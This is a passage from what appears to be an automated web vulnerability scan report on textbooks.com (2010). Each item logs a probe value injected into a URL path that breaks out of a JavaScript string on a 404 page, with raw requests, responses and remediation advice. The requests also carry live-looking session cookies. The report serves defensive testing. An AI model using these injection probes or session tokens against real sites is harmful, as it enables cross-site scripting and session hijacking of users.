Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/jquery-1.3.2.jsb3e14';0791930f4a'

</script>
...[SNIP]...

1.63. http://www.textbooks.com/js/main.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f49c'%3bbd59fafbda9 was submitted in the REST URL parameter 1. This input was echoed as 2f49c';bd59fafbda9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2f49c'%3bbd59fafbda9/main.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js2f49c';bd59fafbda9/main.js'

</script>
...[SNIP]...

1.64. http://www.textbooks.com/js/main.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66a8a'%3ba6336bb3b2d was submitted in the REST URL parameter 2. This input was echoed as 66a8a';a6336bb3b2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/main.js66a8a'%3ba6336bb3b2d HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/main.js66a8a';a6336bb3b2d'

</script>
...[SNIP]...

1.65. http://www.textbooks.com/js/php.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f644d'%3b14ddfdf26d3 was submitted in the REST URL parameter 1. This input was echoed as f644d';14ddfdf26d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsf644d'%3b14ddfdf26d3/php.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsf644d';14ddfdf26d3/php.js'

</script>
...[SNIP]...

1.66. http://www.textbooks.com/js/php.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50ee'%3b79a43433c69 was submitted in the REST URL parameter 2. This input was echoed as d50ee';79a43433c69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/php.jsd50ee'%3b79a43433c69 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
Reset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/php.jsd50ee';79a43433c69'

</script>
...[SNIP]...

1.67. http://www.textbooks.com/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f132a'%3be1b2a7fb7eb was submitted in the REST URL parameter 1. This input was echoed as f132a';e1b2a7fb7eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsf132a'%3be1b2a7fb7eb/s_code.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsf132a';e1b2a7fb7eb/s_code.js'

</script>
...[SNIP]...

1.68. http://www.textbooks.com/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72fc8'%3bc42524fe374 was submitted in the REST URL parameter 2. This input was echoed as 72fc8';c42524fe374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/s_code.js72fc8'%3bc42524fe374 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
